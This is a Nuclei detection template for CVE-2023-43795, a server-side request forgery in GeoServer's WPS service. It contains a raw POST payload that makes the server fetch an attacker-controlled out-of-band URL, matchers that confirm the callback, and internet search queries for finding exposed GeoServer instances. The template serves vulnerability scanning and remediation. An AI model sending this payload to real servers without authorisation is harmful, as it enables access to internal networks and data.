id: CVE-2023-43795

info:
  name: GeoServer WPS - Server Side Request Forgery
  author: DhiyaneshDK
  severity: critical
  description: |
    GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. The OGC Web Processing Service (WPS) specification is designed to process information from any server using GET and POST requests. This presents the opportunity for Server Side Request Forgery. This vulnerability has been patched in version 2.22.5 and 2.23.2.
  impact: |
    Unauthenticated attackers can exploit SSRF through the WPS service to make arbitrary HTTP requests and access internal network resources, potentially compromising the entire GeoServer infrastructure and accessing sensitive geospatial data.
  remediation: |
    Update GeoServer to version 2.22.5 or 2.23.2 or later that validates URLs in WPS requests and restricts access to authorized external resources only.
  reference:
    - https://www.synacktiv.com/advisories/unauthenticated-server-side-request-forgery-crlf-injection-in-geoserver-wms.html
    - https://github.com/geoserver/geoserver/security/advisories/GHSA-5pr3-m5hm-9956
    - https://nvd.nist.gov/vuln/detail/CVE-2023-43795
    - https://github.com/20142995/sectool
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-43795
    cwe-id: CWE-918
    epss-score: 0.89488
    epss-percentile: 0.99567
    cpe: cpe:2.3:a:osgeo:geoserver:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: osgeo
    product: geoserver
    shodan-query:
      - title:"GeoServer"
      - http.title:"geoserver"
    fofa-query:
      - app="GeoServer"
      - app="geoserver"
      - title="geoserver"
    google-query: intitle:"geoserver"
  tags: cve2023,cve,geoserver,ssrf,oast,oos,osgeo,vkev,vuln
variables:
  oast: "{{interactsh-url}}"
  string: "{{to_lower(rand_text_alpha(4))}}"
  value: "{{to_lower(rand_text_alpha(5))}}"

http:
  - raw:
      - |
        POST {{path}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/xml

        <?xml version="1.0" encoding="UTF-8"?>
        <wps:Execute version="1.0.0" service="WPS"
          xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
          xmlns="http://www.opengis.net/wps/1.0.0"
          xmlns:wfs="http://www.opengis.net/wfs"
          xmlns:wps="http://www.opengis.net/wps/1.0.0"
          xmlns:ows="http://www.opengis.net/ows/1.1"
          xmlns:gml="http://www.opengis.net/gml"
          xmlns:ogc="http://www.opengis.net/ogc"
          xmlns:wcs="http://www.opengis.net/wcs/1.1.1"
          xmlns:xlink="http://www.w3.org/1999/xlink"
                xsi:schemaLocation="http://www.opengis.net/wps/1.0.0 http://schemas.opengis.net/wps/1.0.0/wpsAll.xsd">
          <ows:Identifier>JTS:area</ows:Identifier>
          <wps:DataInputs>
            <wps:Input>
              <ows:Identifier>geom</ows:Identifier>
              <wps:Reference mimeType="application/json" xlink:href="https://{{oast}}" method="GET">
                <wps:Header key="{{string}}" value="{{value}}"/>
              </wps:Reference>
            </wps:Input>
          </wps:DataInputs>
          <wps:ResponseForm>
            <wps:RawDataOutput>
              <ows:Identifier>result</ows:Identifier>
            </wps:RawDataOutput>
          </wps:ResponseForm>
        </wps:Execute>

    payloads:
      path:
        - /wms
        - /geoserver/wms

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - contains(interactsh_protocol, 'http')
          - contains_all(to_lower(interactsh_request), '{{string}}','{{value}}')
          - status_code == 200
        condition: and
# digest: 4b0a00483046022100b5ae22f3deb18ab19b8889b596d836ec5441da3397de71557d6118fcd21bc3af022100eb2c1602b88d9bd016558a63fa54a8e9df6884ad58dd9d282fb607a79d1d9170:922c64590222798bb761d5b6d8e72950